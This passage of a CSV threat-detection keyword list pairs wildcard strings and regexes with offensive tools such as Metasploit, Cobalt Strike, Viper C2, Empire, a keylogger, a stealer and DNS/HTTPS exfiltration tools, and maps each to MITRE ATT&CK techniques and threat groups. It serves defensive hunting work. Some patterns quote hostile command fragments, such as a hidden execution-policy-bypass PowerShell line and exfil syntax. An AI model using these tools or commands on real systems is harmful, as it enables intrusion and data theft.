"*execute-dotnet-assembly*",".{0,1000}execute\-dotnet\-assembly.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","43488"
"*execute-pe svchost whoami.exe*",".{0,1000}execute\-pe\ssvchost\swhoami\.exe.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","43489"
"*execute-pe.py*",".{0,1000}execute\-pe\.py.{0,1000}","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/merlin","1","1","N/A","N/A","10","10","94","16","2025-04-16T13:05:47Z","2021-01-25T12:36:46Z","43490"
"*executepersistence*",".{0,1000}executepersistence.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","10","475","73","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z","43491"
"*execute-Pezor*",".{0,1000}execute\-Pezor.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","1","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","43492"
"*Executes a chosen Mimikatz command*",".{0,1000}Executes\sa\schosen\sMimikatz\scommand.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","N/A","10","2","182","36","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z","43493"
"*Executes a powershell command on the remote host. Requires PSCMD*",".{0,1000}Executes\sa\spowershell\scommand\son\sthe\sremote\shost\.\sRequires\sPSCMD.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","Black Basta","C2","https://github.com/skelsec/evilrdp","1","0","N/A","N/A","10","10","299","31","2025-03-15T13:37:21Z","2023-11-29T13:44:58Z","43494"
"*Executes everything but DCSync - requires admin*",".{0,1000}Executes\severything\sbut\sDCSync\s\-\srequires\sadmin.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","N/A","10","2","182","36","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z","43495"
"*execute-shellcode.py*",".{0,1000}execute\-shellcode\.py.{0,1000}","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/merlin","1","1","N/A","N/A","10","10","94","16","2025-04-16T13:05:47Z","2021-01-25T12:36:46Z","43496"
"*Executing the exploit this may take a while.........................................*",".{0,1000}Executing\sthe\sexploit\sthis\smay\stake\sa\swhile\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..{0,1000}","offensive_tool_keyword","POC","Exploit tool for CVE-2023-4911 targeting the 'Looney Tunables' glibc vulnerability in various Linux distributions.","T1068 - T1210 - T1555","TA0001 - TA0003 - TA0005","N/A","N/A","Exploitation tool","https://github.com/chaudharyarjun/LooneyPwner","1","0","#content #linux","N/A","10","1","38","12","2023-10-18T04:59:50Z","2023-10-17T07:44:16Z","43497"
"*Execution_CommandAndScriptingInterpreter_UploadAndExec.py*",".{0,1000}Execution_CommandAndScriptingInterpreter_UploadAndExec\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","43498"
"*Execution_UserExecution_CallbackCreateThreadpoolWait.py*",".{0,1000}Execution_UserExecution_CallbackCreateThreadpoolWait\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","43499"
"*Execution_UserExecution_CallbackCreateTimerQueue.py*",".{0,1000}Execution_UserExecution_CallbackCreateTimerQueue\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","43500"
"*Execution_UserExecution_CallbackEnumChildWindows.py*",".{0,1000}Execution_UserExecution_CallbackEnumChildWindows\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","43501"
"*Execution_UserExecution_CallbackEnumWindows.py*",".{0,1000}Execution_UserExecution_CallbackEnumWindows\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","43502"
"*Execution_UserExecution_DirectConnectReverseHTTPS.py*",".{0,1000}Execution_UserExecution_DirectConnectReverseHTTPS\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","43503"
"*Execution_UserExecution_DirectConnectReverseTCPRc4.py*",".{0,1000}Execution_UserExecution_DirectConnectReverseTCPRc4\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","43504"
"*Execution_UserExecution_FakePPID.py*",".{0,1000}Execution_UserExecution_FakePPID\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","43505"
"*Execution_UserExecution_LinuxBaseShellcodeLoader.py*",".{0,1000}Execution_UserExecution_LinuxBaseShellcodeLoader\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","#linux","N/A","10","","N/A","","","","43506"
"*Execution_UserExecution_LinuxSelfGuardLoader.py*",".{0,1000}Execution_UserExecution_LinuxSelfGuardLoader\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","#linux","N/A","10","","N/A","","","","43507"
"*Execution_UserExecution_NtCreateSection.py*",".{0,1000}Execution_UserExecution_NtCreateSection\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","43508"
"*Execution_UserExecution_Syscall_inject.py*",".{0,1000}Execution_UserExecution_Syscall_inject\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","43509"
"*Execution_UserExecution_VSSyscallProject.py*",".{0,1000}Execution_UserExecution_VSSyscallProject\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","43510"
"*-ExecutionPolicy Bypass -File Win10.ps1 *",".{0,1000}\-ExecutionPolicy\sBypass\s\-File\sWin10\.ps1\s.{0,1000}","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","0","N/A","N/A","N/A","10","7168","1313","2024-09-24T19:14:18Z","2019-03-26T22:36:32Z","43511"
"*-ExecutionPolicy Bypass -File Win11.ps1 *",".{0,1000}\-ExecutionPolicy\sBypass\s\-File\sWin11\.ps1\s.{0,1000}","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","0","N/A","N/A","N/A","10","7168","1313","2024-09-24T19:14:18Z","2019-03-26T22:36:32Z","43512"
"*-ExecutionPolicy Bypass -WindowStyle Hidden -Command & {taskkill /f /im mmc.exe*",".{0,1000}\-ExecutionPolicy\sBypass\s\-WindowStyle\sHidden\s\-Command\s\&\s\{taskkill\s\/f\s\/im\smmc\.exe.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","43513"
"*exegol4thewin*",".{0,1000}exegol4thewin.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","43514"
"*ExegolController.py*",".{0,1000}ExegolController\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","43515"
"*exegol-docker-build*",".{0,1000}exegol\-docker\-build.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","43516"
"*ExegolExceptions.py*",".{0,1000}ExegolExceptions\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","43517"
"*Exegol-images-main*",".{0,1000}Exegol\-images\-main.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","43518"
"*ExegolManager.py*",".{0,1000}ExegolManager\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","43519"
"*ExegolProgress.py*",".{0,1000}ExegolProgress\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","43520"
"*ExegolPrompt.py*",".{0,1000}ExegolPrompt\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","43521"
"*ExeStager.csproj*",".{0,1000}ExeStager\.csproj.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","43522"
"*ExeToInjectInTo.*",".{0,1000}ExeToInjectInTo\..{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","43523"
"*ExeToLaunch StringToBePutAsCmdline*",".{0,1000}ExeToLaunch\sStringToBePutAsCmdline.{0,1000}","offensive_tool_keyword","FakeCmdLine","Simple demonstration (C source code and compiled .exe) of a less-known (but documented) behavior of CreateProcess() function. Effectively you can put any string into the child process Command Line field.","T1059 - T1036","TA0003","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/tree/master/FakeCmdLine","1","0","N/A","N/A","N/A","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","43524"
"*ExetoText.ps1*",".{0,1000}ExetoText\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","43525"
"*exfil -regex* -domain*-url * -filepath *",".{0,1000}exfil\s\-regex.{0,1000}\s\-domain.{0,1000}\-url\s.{0,1000}\s\-filepath\s.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","0","N/A","N/A","9","1","15","0","2025-03-12T07:34:04Z","2025-03-12T06:58:51Z","43526"
"*ExfilDataToGitHub*",".{0,1000}ExfilDataToGitHub.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-ExfilDataToGitHub.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","43527"
"*Exfil-EC266392-D6BC-4F7B-A4D1-410166D30B55.json*",".{0,1000}Exfil\-EC266392\-D6BC\-4F7B\-A4D1\-410166D30B55\.json.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tool","https://github.com/mbrg/power-pwn","1","1","N/A","N/A","10","10","939","100","2025-03-20T08:54:43Z","2022-06-14T11:40:21Z","43528"
"*Exfiltrate::exfilLogs()*",".{0,1000}Exfiltrate\:\:exfilLogs\(\).{0,1000}","offensive_tool_keyword","peeping-tom","Remote keylogger for Windows written in C++","T1056.001 - T1123 - T1129 - T1113","TA0006 - TA0008 - TA0009","N/A","Dispossessor","Collection","https://github.com/shehzade/peeping-tom","1","0","#content","keylogger","10","1","3","0","2022-07-24T09:31:59Z","2022-04-15T14:16:41Z","43529"
"*exfiltrate_via_post.exe*",".{0,1000}exfiltrate_via_post\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","1","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","43530"
"*Exfiltration from DNS finished!*",".{0,1000}Exfiltration\sfrom\sDNS\sfinished!.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","43531"
"*Exfiltration from HTTPS finished!*",".{0,1000}Exfiltration\sfrom\sHTTPS\sfinished!.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","43532"
